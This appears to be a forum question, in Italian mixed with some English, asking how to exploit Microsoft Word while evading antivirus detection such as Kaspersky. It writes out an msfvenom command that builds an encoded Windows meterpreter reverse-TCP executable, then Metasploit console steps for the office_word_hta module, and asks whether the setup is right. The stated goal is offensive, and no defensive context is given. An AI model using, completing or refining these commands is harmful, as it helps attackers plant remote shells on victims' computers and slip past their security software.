Sto cercando di sfruttare MS Word, evitando il rilevamento AV. Quindi, cosa devo fare?
In primo luogo, generando il payload, ad esempio:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 3 -o ~/payload.exe
1. Quale file dovrebbe essere? EXE? Se imposto "-f exe", devo ancora impostare il nome "payload.exe" di "payload"?
2. Come scegliere quali codificatori utilizzare e quali iterazioni evitare i rilevamenti di AV Kaspersky per esempio? Provare da uno all'altro o cosa?
Quindi vado su msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set lhost srvhost 172.20.10.4
msf exploit(office_word_hta) > set srvhost 172.20.10.4
msf exploit(office_word_hta) > set payload generic/custom right?
then set payloadfile pointing to ~/payload.exe?
msf exploit(office_word_hta) > exploit
Sto facendo bene?)